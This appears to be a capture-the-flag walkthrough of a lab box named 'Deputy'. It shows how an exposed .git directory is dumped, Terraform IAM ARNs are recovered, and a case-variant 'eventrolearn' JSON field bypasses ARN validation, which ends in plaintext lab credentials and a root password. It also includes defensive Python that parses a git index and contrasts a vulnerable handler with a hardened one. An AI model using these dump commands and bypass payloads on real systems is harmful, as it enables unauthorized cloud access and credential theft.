Myles Nieman

Deputy

Overview

Deputy is a medium Linux box built around a cloud-flavored web application. A .git directory left exposed on the web server leaks Terraform infrastructure files that include AWS IAM ARNs. The application's event-role endpoint validates the eventRoleArn field, but it also accepts the same parameter under the all-lowercase name eventrolearn, which skips that validation and lets a leaked role ARN with a substituted account ID be used across account boundaries. That grants access to a DynamoDB table holding credentials for the user mark, and mark's view of the application in turn exposes a second password that is the root password on the host.

Path: exposed .git → Terraform ARN leak → cross-account IAM role via parameter case bypass → DynamoDB credential dump → root.

Enumeration

The initial scan reveals a web server on port 80. The nmap output confirms a Linux host serving a web application.

Nmap results for Deputy

Directory brute-forcing surfaces a .git directory at the root of the web server, a classic misconfiguration that exposes the repository, including its full history, to unauthenticated access. Requesting /.git/HEAD and getting back a ref: refs/heads/... line confirms the directory is readable before any dumping starts.

Foothold — Git Dump and ARN Discovery

With a .git directory exposed, GitTools/Dumper can reconstruct the repository:

$ git clone https://github.com/internetwache/GitTools
$ cd GitTools/Dumper
$ ./gitdumper.sh http://deputy.htb/.git/ /tmp/deputy-git
$ cd /tmp/deputy-git && git checkout -- .   # rebuild the working tree from the dumped objects

GitTools dumper pulling the exposed .git directory

Reconstructing the working tree reveals Terraform configuration files:

Terraform files recovered from the git dump

The Terraform configs contain AWS IAM ARNs used to provision the application’s backend infrastructure — notably a role ARN tied to a DynamoDB event helper.
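A lighter first step than dumping every object is to fetch only /.git/index and list the tracked paths: it shows at once whether files like *.tf or a .tfstate are in the repository and worth pulling. The following is an added example, not code from the original writeup or from GitTools. It is a minimal parser for the version-2 index format, exercised against an index constructed inline with assumed file names (no network access; the stat fields and object ids in the constructed index are dummies).

```python
import hashlib
import struct
from typing import List

# .git/index layout (version 2): 12-byte header, one entry per tracked path,
# optional extensions, then a 20-byte SHA-1 over everything that precedes it.
HEADER = struct.Struct(">4sII")          # signature "DIRC", version, entry count
ENTRY_FIXED = struct.Struct(">10I20sH")  # ctime/mtime (s,ns), dev, ino, mode, uid, gid, size, sha1, flags
ENTRY_FIXED_LEN = ENTRY_FIXED.size       # 62 bytes


def parse_index(data: bytes) -> List[str]:
    """Return the tracked paths in a version-2 .git/index blob.

    Raises ValueError on a bad signature, version or trailing checksum, so a
    404 page or a truncated download is not mistaken for an index.
    """
    if len(data) < HEADER.size + 20:
        raise ValueError("too short to be a git index")
    sig, version, count = HEADER.unpack_from(data, 0)
    if sig != b"DIRC":
        raise ValueError("bad signature (not a git index)")
    if version != 2:
        raise ValueError(f"unsupported index version {version}")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("checksum mismatch (truncated or corrupted index)")

    paths = []
    offset = HEADER.size
    for _ in range(count):
        fields = ENTRY_FIXED.unpack_from(data, offset)
        flags = fields[-1]
        name_len = flags & 0x0FFF          # low 12 bits; 0xFFF means "longer, scan for the NUL"
        start = offset + ENTRY_FIXED_LEN
        if name_len < 0x0FFF:
            end = start + name_len
        else:
            end = data.index(b"\x00", start)
        paths.append(data[start:end].decode("utf-8", "surrogateescape"))
        # Each entry is NUL-padded to a multiple of 8 bytes, with at least one
        # NUL terminating the path.
        entry_len = ENTRY_FIXED_LEN + (end - start)
        offset += entry_len + (8 - entry_len % 8)
    return paths


def build_index(paths: List[str]) -> bytes:
    """Construct a minimal, checksummed version-2 index for the given paths.

    Exists only to give parse_index() realistic offline input; stat fields
    and object ids are zero/dummy values that git itself would never write.
    """
    body = bytearray(HEADER.pack(b"DIRC", 2, len(paths)))
    for p in paths:
        name = p.encode()
        flags = min(len(name), 0x0FFF)
        body += ENTRY_FIXED.pack(0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 0, b"\x00" * 20, flags)
        body += name
        entry_len = ENTRY_FIXED_LEN + len(name)
        body += b"\x00" * (8 - entry_len % 8)
    return bytes(body) + hashlib.sha1(body).digest()


def interesting_paths(paths: List[str]) -> List[str]:
    """Flag infrastructure files that commonly carry ARNs, account ids or secrets."""
    suffixes = (".tf", ".tfvars", ".tfstate", ".env")
    names = {"credentials", ".env"}
    return [p for p in paths if p.endswith(suffixes) or p.rsplit("/", 1)[-1] in names]


# Constructed sample: file names assumed for illustration, not taken from the box.
SAMPLE_INDEX = build_index([
    "app/main.py",
    "infra/main.tf",
    "infra/iam.tf",
    "infra/terraform.tfstate",
    "static/js/app.js",
])

if __name__ == "__main__":
    tracked = parse_index(SAMPLE_INDEX)
    print(f"{len(tracked)} tracked paths")
    for p in interesting_paths(tracked):
        print("  worth fetching:", p)
```

Against a real target the same parser is fed the bytes returned for /.git/index; the checksum check is what tells a genuine index apart from a soft-404 page that happens to return 200.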

Enumeration — Web Application

Browsing to the web application shows a registration and login flow:

Deputy web application landing page

Registering an account (myles:myles123) and logging in reveals that authentication is handled via a JWT:

Authenticated session JWT visible in browser

The application also exposes a guest account (guest-user:guest-password) that can be used to explore:

Guest account login

Application functionality available to guest user

The application ties accounts together via a redirect mechanism:

Account linking via redirect

Account linking confirmed

Exploitation — Cross-Account IAM Role Bypass

The application exposes a role creation endpoint that accepts a JSON body with eventName, eventRoleArn, and eventTable. The frontend hardcodes an ARN, but intercepting the request in Burp allows modification:

Role creation form accepting Name, ARN, and Table parameters

The first attempt takes the role ARN recovered from the git dump, swaps in the target account ID, and sends it in the eventRoleArn field:

First ARN substitution attempt with target account ID

Publishing the role

Initial result after publishing

Validation is applied to the camelCase field eventRoleArn, which is the field the first attempt hits. Sending the same value under the all-lowercase key eventrolearn skips that validation entirely, and the backend still consumes it as the role ARN without complaint:

{"eventName":"AllowEventHelperDynamoDBAccess","eventrolearn":"arn:aws:iam::789411671902:role/eventhelper","eventTable":"servers"}

Lowercase field name bypasses ARN validation
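The bug class behind this is a validator and a consumer that disagree on how parameter names are matched: the check looks for the exact key eventRoleArn, while the code that uses the value looks it up case-insensitively, so anything sent as eventrolearn is used without ever being checked. The following is an added example, not the box's actual code. It models that vulnerable handler beside a hardened one that canonicalizes the key set before validating and parses the ARN structurally instead of substring-matching it; the trusted account id 111111111111, the handler names and the request bodies are assumptions built from the JSON shown above.

```python
import re
from dataclasses import dataclass
from typing import Dict, Mapping, Optional, Tuple

# Account whose roles the application may hand out (assumed value for the example).
TRUSTED_ACCOUNT = "111111111111"
EXPECTED_FIELDS = ("eventName", "eventRoleArn", "eventTable")

# arn:partition:service:region:account-id:resource. IAM ARNs have an empty
# region; the account id, when present, is exactly 12 digits.
ARN_RE = re.compile(
    r"^arn:(?P<partition>aws|aws-cn|aws-us-gov):(?P<service>[a-z0-9-]+):"
    r"(?P<region>[a-z0-9-]*):(?P<account>\d{12}|):(?P<resource>.+)$"
)


@dataclass(frozen=True)
class Arn:
    partition: str
    service: str
    region: str
    account: str
    resource: str


def parse_arn(value: str) -> Optional[Arn]:
    m = ARN_RE.match(value)
    return Arn(**m.groupdict()) if m else None


def _lookup_ci(body: Mapping[str, str], name: str) -> Optional[str]:
    """Case-insensitive parameter lookup, as some frameworks and hand-rolled parsers do."""
    for k, v in body.items():
        if k.lower() == name.lower():
            return v
    return None


def vulnerable_handler(body: Mapping[str, str]) -> Tuple[int, str]:
    """Validates the exact key 'eventRoleArn', then reads the ARN case-insensitively.

    A value sent as 'eventrolearn' is never seen by the check but is still used.
    """
    declared = body.get("eventRoleArn")
    if declared is not None and f":{TRUSTED_ACCOUNT}:" not in declared:
        return 403, "role ARN must belong to this account"
    role_arn = _lookup_ci(body, "eventRoleArn")   # picks up 'eventrolearn' as well
    if role_arn is None:
        return 400, "eventRoleArn is required"
    return 200, f"assuming {role_arn}"


def hardened_handler(body: Mapping[str, str]) -> Tuple[int, str]:
    """Canonicalize the key set, validate the parsed ARN, then use only the validated value."""
    # 1. Reject unknown keys and keys that differ from an expected one only by case,
    #    so exactly one spelling of each parameter exists for the validator to see.
    canon: Dict[str, str] = {}
    for k, v in body.items():
        matches = [f for f in EXPECTED_FIELDS if f.lower() == k.lower()]
        if not matches or k != matches[0] or k in canon:
            return 400, f"unexpected or duplicate field: {k}"
        canon[k] = v
    missing = [f for f in EXPECTED_FIELDS if f not in canon]
    if missing:
        return 400, f"missing fields: {', '.join(missing)}"

    # 2. Parse the ARN structurally instead of substring-matching the account id.
    arn = parse_arn(canon["eventRoleArn"])
    if arn is None or arn.service != "iam" or not arn.resource.startswith("role/"):
        return 400, "eventRoleArn is not an IAM role ARN"
    if arn.account != TRUSTED_ACCOUNT:
        return 403, "role ARN must belong to this account"

    # 3. Only the validated value reaches the privileged operation.
    return 200, f"assuming {canon['eventRoleArn']}"


# Constructed requests modelled on the bodies in the writeup.
LEGIT = {"eventName": "AllowEventHelperDynamoDBAccess",
         "eventRoleArn": f"arn:aws:iam::{TRUSTED_ACCOUNT}:role/eventhelper",
         "eventTable": "servers"}
CROSS_ACCOUNT = dict(LEGIT, eventRoleArn="arn:aws:iam::789411671902:role/eventhelper")
CASE_BYPASS = {"eventName": LEGIT["eventName"],
               "eventrolearn": "arn:aws:iam::789411671902:role/eventhelper",
               "eventTable": "servers"}

if __name__ == "__main__":
    for label, req in (("legit", LEGIT), ("cross-account", CROSS_ACCOUNT), ("case-bypass", CASE_BYPASS)):
        print(f"{label:14} vulnerable={vulnerable_handler(req)}  hardened={hardened_handler(req)}")
```

The order in the hardened version matters: the key set is normalized before any field is read, so the validator and the consumer cannot see different values for the same logical parameter, and the account comparison is done on a parsed field rather than on a substring that an attacker could plant elsewhere in the ARN.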

User — DynamoDB Credential Leak

With the cross-account role assumed, the application queries a DynamoDB table named servers. The response includes plaintext credentials:

DynamoDB record returned with mark’s credentials

mark@deputy.htb : bVhrE29cSbLP
[{"Password":"bVhrE29cSbLP","Server":"hws","Username":"mark","data":"servers","name":"hws-info"}]

Logging into the application as mark works:

Logged in as mark

Mark’s account view

Root

Exploring the application further as mark reveals an additional password:

Application reveals the password D3puty0GfhCe

The password D3puty0GfhCe is the root password on the underlying host, granting direct privilege escalation.

Takeaways

  • Exposed .git directories are a full source-code leak. Infrastructure code in the repository — Terraform files, ARNs, account IDs — hands an attacker the map to your cloud backend before they’ve touched a single endpoint.
  • API field-name case sensitivity is not a security boundary. Trusting the frontend to enforce which fields are sent, while the backend silently accepts alternate casings of the same parameter, is a trivially bypassable control.